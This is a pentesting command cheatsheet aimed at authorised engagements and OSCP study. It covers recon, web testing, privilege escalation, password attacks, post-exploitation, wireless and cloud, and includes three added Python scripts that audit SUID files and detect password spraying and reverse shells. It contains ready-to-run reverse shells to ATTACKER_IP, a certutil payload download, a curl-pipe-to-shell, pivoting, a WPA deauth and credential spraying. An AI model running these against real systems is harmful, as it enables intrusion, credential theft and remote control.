Pentesting Commands Cheatsheet 2026

200+ essential pentesting commands organized by category. From recon to post-exploitation — everything you need for your next pentest engagement or OSCP exam.

# Reconnaissance

Information gathering is the foundation of every pentest. Start with passive recon, then move to active scanning.

## Nmap — Network Discovery

```bash
# Default scripts + version detection with output in all formats
nmap -sC -sV -oA scan_results TARGET_IP
# Full TCP port scan — fast mode
nmap -p- -T4 --min-rate=1000 TARGET_IP
# UDP scan on top 200 ports
nmap -sU --top-ports 200 TARGET_IP
# Run all vulnerability detection scripts
nmap --script vuln TARGET_IP
```

## Subdomain & DNS Enumeration

```bash
# Passive subdomain enumeration
subfinder -d TARGET_DOMAIN -o subdomains.txt
# In-depth subdomain enumeration with OSINT
amass enum -d TARGET_DOMAIN -o amass_results.txt
# Attempt DNS zone transfer
dig axfr @DNS_SERVER TARGET_DOMAIN
```

## Directory & File Brute-force

```bash
# Fast recursive directory brute-force with extensions
feroxbuster -u https://TARGET -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -x php,html,js
# Classic directory brute-force with 50 threads
gobuster dir -u https://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50
```

# Web Application Hacking

Test for OWASP Top 10 vulnerabilities: SQLi, XSS, SSRF, IDOR, authentication bypass, and more.

## SQL Injection

```bash
# Automatic SQLi detection + database enumeration
sqlmap -u "https://TARGET/page?id=1" --dbs --batch
# Enumerate tables in a specific database
sqlmap -u "https://TARGET/page?id=1" -D dbname --tables --batch
# SQLi from saved Burp request with max level
sqlmap -r request.txt --level 5 --risk 3 --batch
```

## XSS (Cross-Site Scripting)

```bash
# Automated XSS scanner with callback for blind XSS
dalfox url "https://TARGET/search?q=FUZZ" -b YOUR_CALLBACK
```

## SSRF & LFI

```bash
# SSRF fuzzing with response matching
ffuf -u "https://TARGET/fetch?url=FUZZ" -w /usr/share/seclists/Discovery/Web-Content/ssrf.txt -mr "root:"
# Local File Inclusion fuzzing
ffuf -u "https://TARGET/page?file=FUZZ" -w /usr/share/seclists/Fuzzing/LFI/LFI-gracefulsecurity-linux.txt -fc 404
```

## Burp Suite Essentials

```bash
# Route traffic through Burp proxy
curl -x http://127.0.0.1:8080 -k https://TARGET
```

# Network Services

Common protocols and services you'll encounter during pentests: SMB, FTP, SSH, HTTP, SNMP.

## SMB Enumeration

```bash
# List SMB shares anonymously
smbclient -L //TARGET_IP -N
# Full SMB/NetBIOS enumeration
enum4linux -a TARGET_IP
# Enumerate shares with null session
crackmapexec smb TARGET_IP -u '' -p '' --shares
```

## FTP

```bash
# Connect with anonymous access (try anonymous:anonymous)
ftp TARGET_IP
```

## SNMP

```bash
# Walk SNMP tree with community string "public"
snmpwalk -v2c -c public TARGET_IP
```

# Linux Privilege Escalation

After getting a shell, escalate to root. Check SUID, capabilities, cron jobs, and kernel exploits.

## Enumeration Scripts

```bash
# Run LinPEAS for automated privesc enumeration
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
```

## SUID Binaries

```bash
# Find all SUID binaries — cross-reference with GTFOBins
find / -perm -4000 -type f 2>/dev/null
```

## Capabilities

```bash
# List files with Linux capabilities
getcap -r / 2>/dev/null
```

## Cron Jobs

```bash
# Check all scheduled cron jobs (";" so one missing file does not stop the rest)
cat /etc/crontab; ls -la /etc/cron.*; crontab -l
```

## Sudo Misconfigurations

```bash
# List commands the current user can run as sudo
sudo -l
```

## Writable /etc/passwd

```bash
# Generate password hash to inject into /etc/passwd if writable
openssl passwd -1 -salt hacker password123
```
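The SUID, cron and writable-`/etc/passwd` checks above are the same ones an administrator should run against their own hosts before an attacker does. The script below is an added example, not part of the original cheatsheet: it walks a directory tree and reports SUID/SGID binaries and world-writable copies of sensitive files (the `SENSITIVE_FILES` list and the demo fixture are assumptions), so a host can be baselined and the report diffed after changes.

```python
"""Defender-side audit for the Linux privesc conditions listed above.

Added example, not from the original cheatsheet. It reports the same
things the commands above look for: SUID/SGID binaries and world-writable
sensitive files (passwd, sudoers, crontab, cron directories). Pass "/" on a
real host; the demo builds a constructed fake root in a temp directory.
"""
import os
import stat
import tempfile
from dataclasses import dataclass, field
from typing import List

# Assumption: a typical FHS layout; relative paths from the scanned root
SENSITIVE_FILES = ("etc/passwd", "etc/shadow", "etc/sudoers", "etc/crontab")


@dataclass
class AuditReport:
    suid: List[str] = field(default_factory=list)
    sgid: List[str] = field(default_factory=list)
    world_writable: List[str] = field(default_factory=list)


def audit_tree(root: str) -> AuditReport:
    """Scan `root` and collect files whose mode bits are a privesc risk."""
    report = AuditReport()
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue  # unreadable or vanished; same effect as 2>/dev/null
            if not stat.S_ISREG(st.st_mode):
                continue
            mode = st.st_mode
            if mode & stat.S_ISUID:
                report.suid.append(path)
            if mode & stat.S_ISGID:
                report.sgid.append(path)
            rel = os.path.relpath(path, root)
            in_cron = rel.startswith("etc/cron")
            # World-writable bit on a file cron or login code trusts
            if (mode & stat.S_IWOTH) and (rel in SENSITIVE_FILES or in_cron):
                report.world_writable.append(path)
    return report


def build_demo_tree() -> str:
    """Constructed fixture: one SUID binary, one world-writable passwd, one sane cron file."""
    root = tempfile.mkdtemp(prefix="audit_demo_")
    os.makedirs(os.path.join(root, "usr/bin"))
    os.makedirs(os.path.join(root, "etc/cron.d"))
    suid_bin = os.path.join(root, "usr/bin/demo_suid")
    with open(suid_bin, "w") as f:
        f.write("#!/bin/sh\n")
    os.chmod(suid_bin, 0o4755)  # rwsr-xr-x (chmod after write, or the kernel clears the bit)
    passwd = os.path.join(root, "etc/passwd")
    with open(passwd, "w") as f:
        f.write("root:x:0:0:root:/root:/bin/bash\n")
    os.chmod(passwd, 0o666)  # the misconfiguration the section above refers to
    cron_job = os.path.join(root, "etc/cron.d/backup")
    with open(cron_job, "w") as f:
        f.write("* * * * * root /opt/backup.sh\n")
    os.chmod(cron_job, 0o644)  # correct permissions, must not be flagged
    return root


if __name__ == "__main__":
    r = audit_tree(build_demo_tree())
    print("SUID:", r.suid)
    print("SGID:", r.sgid)
    print("World-writable sensitive:", r.world_writable)
```

Run it as root against `/` for a complete picture; as an unprivileged user it silently skips what it cannot stat, just like the `2>/dev/null` in the one-liners above. Capabilities are not covered here because they live in extended attributes, not mode bits; keep `getcap -r /` in the baseline for those.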

# Windows Privilege Escalation

Escalate from low-priv user to SYSTEM. Token impersonation, service abuse, unquoted paths.

## Enumeration

```powershell
# Run WinPEAS for automated Windows privesc enumeration
.\winPEASany.exe quiet fast searchfast
# Check current privileges — look for SeImpersonate, SeBackup
whoami /priv
```

## Token Impersonation

```powershell
# Exploit SeImpersonatePrivilege (Windows Server 2019+)
.\GodPotato.exe -cmd "cmd /c whoami"
```

## Unquoted Service Paths

```powershell
# Find services with unquoted paths outside system directories
wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
```

Note that `wmic` is deprecated and is not installed by default on recent Windows 11 builds; the same service fields are available from PowerShell through the `Win32_Service` CIM class.

# Password Attacks

Crack hashes, brute-force services, and spray credentials across the network.

## Hash Cracking

```bash
# Crack NTLM hashes with rules
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt --rules-file /usr/share/hashcat/rules/best64.rule
# Crack hashes with John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
```

## Online Brute-force

```bash
# SSH brute-force (4 threads to avoid lockout)
hydra -l admin -P /usr/share/wordlists/rockyou.txt TARGET_IP ssh -t 4
```

## Password Spraying

```bash
# SMB password spray across user list
crackmapexec smb TARGET_IP -u users.txt -p 'Season2026!' --continue-on-success
```
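A spray like the one above is designed to stay under per-account lockout thresholds: each user sees one failure, so the signal is only visible per source. The detector below is an added example, not part of the original cheatsheet; it counts distinct usernames that fail from one source inside a sliding window. The log line format and the sample lines are constructed for the example, so adapt `LINE_RE` to your own auth log.

```python
"""Detection for the password-spraying pattern shown above.

Added example, not from the original cheatsheet. One source trying a few
passwords against many accounts never trips a per-account lockout, so we
alert on the number of distinct users failing from a single source within
a time window. The log format is a constructed, simplified auth log.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from typing import Deque, Dict, List, Tuple

# Assumption: lines look like "<ISO time> FAIL|OK user=<name> src=<ip>"
LINE_RE = re.compile(r"^(\S+) (FAIL|OK) user=(\S+) src=(\S+)$")


def parse_line(line: str) -> Tuple[datetime, str, str, str]:
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unparseable line: {line!r}")
    ts, result, user, src = m.groups()
    return datetime.fromisoformat(ts), result, user, src


def detect_spray(lines: List[str], window: timedelta = timedelta(minutes=10),
                 min_distinct_users: int = 5) -> Dict[str, int]:
    """Return {src: max distinct users failed inside one window} for sources
    that reach `min_distinct_users`. Lines must be in chronological order."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: Dict[str, int] = {}
    for line in lines:
        ts, result, user, src = parse_line(line)
        if result != "FAIL":
            continue  # successes are not counted; a later success after a spray is a separate alert
        q = recent[src]
        q.append((ts, user))
        while q and ts - q[0][0] > window:
            q.popleft()  # expire failures that fell out of the window
        distinct = len({u for _, u in q})
        if distinct >= min_distinct_users:
            alerts[src] = max(alerts.get(src, 0), distinct)
    return alerts


# Constructed sample: 10.0.0.99 sprays six accounts; 10.0.0.42 is one user mistyping
SAMPLE_LOG = [
    "2026-01-15T09:00:00 FAIL user=alice src=10.0.0.99",
    "2026-01-15T09:00:02 FAIL user=bob src=10.0.0.99",
    "2026-01-15T09:00:04 FAIL user=carol src=10.0.0.99",
    "2026-01-15T09:00:05 FAIL user=dave src=10.0.0.42",
    "2026-01-15T09:00:06 FAIL user=dave src=10.0.0.42",
    "2026-01-15T09:00:07 OK user=dave src=10.0.0.42",
    "2026-01-15T09:00:08 FAIL user=dave src=10.0.0.99",
    "2026-01-15T09:00:10 FAIL user=erin src=10.0.0.99",
    "2026-01-15T09:00:12 FAIL user=frank src=10.0.0.99",
]

if __name__ == "__main__":
    print(detect_spray(SAMPLE_LOG))  # {'10.0.0.99': 6}
```

The threshold is per source, not per account, which is the point: the fat-fingering user at 10.0.0.42 produces two failures on one account and never alerts, while the sprayer's six single failures do. On Windows, the equivalent raw data is event 4625 with the source workstation name or address.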

# Post-Exploitation

After getting access: establish persistence, pivot, exfiltrate data.

## File Transfer

```bash
# Quick HTTP server to transfer files
python3 -m http.server 8080
```

```powershell
# Download file on Windows target
certutil -urlcache -split -f http://ATTACKER_IP:8080/file.exe C:\Temp\file.exe
```

## Reverse Shells

```bash
# Bash reverse shell
bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1
# Python reverse shell
python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect(("ATTACKER_IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
```
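Both reverse shells above share one host-visible trait: the shell's standard streams are a TCP socket instead of a terminal, and on Linux that is exactly what `/proc/<pid>/fd/0..2` shows. The scanner below is an added example, not part of the original cheatsheet; it flags shell-like processes whose stdio fds resolve to `socket:[...]`. The `proc_root` parameter, the `SHELL_NAMES` list and the fake `/proc` fixture are assumptions made so the check can run against constructed data.

```python
"""Host-side detection for the reverse shells listed above.

Added example, not from the original cheatsheet. The shells above dup2() a
socket onto fds 0, 1 and 2, so an interactive shell whose standard streams
link to "socket:[inode]" in /proc is the thing to look for. Run as root on
a real host with the default proc_root="/proc"; unprivileged runs skip
processes they may not inspect.
"""
import os
import tempfile
from typing import Dict, List

# Assumption: process names worth flagging when their stdio is a socket
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "python3", "python", "perl", "nc"}


def stdio_socket_processes(proc_root: str = "/proc") -> List[Dict[str, str]]:
    """Return one record per shell-like process with at least two socket stdio fds."""
    findings: List[Dict[str, str]] = []
    for pid in os.listdir(proc_root):
        if not pid.isdigit():
            continue  # skip self, sys, net, ... entries
        base = os.path.join(proc_root, pid)
        try:
            with open(os.path.join(base, "comm")) as f:
                comm = f.read().strip()
            links = {fd: os.readlink(os.path.join(base, "fd", str(fd))) for fd in (0, 1, 2)}
        except OSError:
            continue  # process exited, or not ours to inspect
        socket_fds = [fd for fd, target in links.items() if target.startswith("socket:")]
        if comm in SHELL_NAMES and len(socket_fds) >= 2:
            findings.append({"pid": pid, "comm": comm, "fds": ",".join(map(str, socket_fds))})
    return findings


def build_fake_proc() -> str:
    """Constructed /proc lookalike: 101 is a normal bash on a pty, 202 has socket stdio,
    303 is a network daemon that legitimately holds sockets but is not a shell."""
    root = tempfile.mkdtemp(prefix="fakeproc_")

    def mk(pid: str, comm: str, targets: List[str]) -> None:
        fd_dir = os.path.join(root, pid, "fd")
        os.makedirs(fd_dir)
        with open(os.path.join(root, pid, "comm"), "w") as f:
            f.write(comm + "\n")
        for fd, target in enumerate(targets):
            os.symlink(target, os.path.join(fd_dir, str(fd)))  # link text mimics /proc

    mk("101", "bash", ["/dev/pts/0", "/dev/pts/0", "/dev/pts/0"])
    mk("202", "sh", ["socket:[12345]", "socket:[12345]", "socket:[12345]"])
    mk("303", "sshd", ["/dev/null", "socket:[999]", "socket:[999]"])
    return root


if __name__ == "__main__":
    print(stdio_socket_processes(build_fake_proc()))  # [{'pid': '202', 'comm': 'sh', 'fds': '0,1,2'}]
```

The name filter keeps daemons that naturally own sockets out of the result; widen `SHELL_NAMES` for your environment, and treat a hit on a web server's worker user as high priority. The `pty.spawn` upgrade in the next section does not defeat this check: the pty is a child of the shell whose fds are still the socket.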

## Shell Upgrade

```bash
# Upgrade to interactive TTY
python3 -c 'import pty;pty.spawn("/bin/bash")'
```

## Pivoting

Set up a SOCKS proxy through the compromised host:

```bash
# On attacker
chisel server -p 8000 --reverse
# On target
chisel client ATTACKER_IP:8000 R:socks
```

# Wireless Attacks

WiFi pentesting: capture handshakes, crack WPA2, rogue access points.

```bash
# Enable monitor mode
airmon-ng start wlan0
# Scan for nearby wireless networks
airodump-ng wlan0mon
# Capture packets from target network
airodump-ng -c CHANNEL --bssid BSSID -w capture wlan0mon
# Deauth attack to capture WPA handshake
aireplay-ng -0 5 -a BSSID wlan0mon
# Crack WPA2 handshake offline
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
```

# Cloud & Kubernetes

Enumerate cloud assets, exploit misconfigurations in AWS, Azure, GCP, and Kubernetes.

## AWS

```bash
# Check current AWS identity
aws sts get-caller-identity
# List public S3 bucket contents
aws s3 ls s3://BUCKET_NAME --no-sign-request
```

## Kubernetes

```bash
# List all pods across namespaces
kubectl get pods --all-namespaces
# Check current permissions
kubectl auth can-i --list
```

## 📚 Related Resources

Want 11,600+ commands in an interactive mindmap?

This cheatsheet shows a fraction of what Pentest Mindmap offers. Get 32 categories, instant search, and one-click copy — organized as a beautiful interactive mindmap.
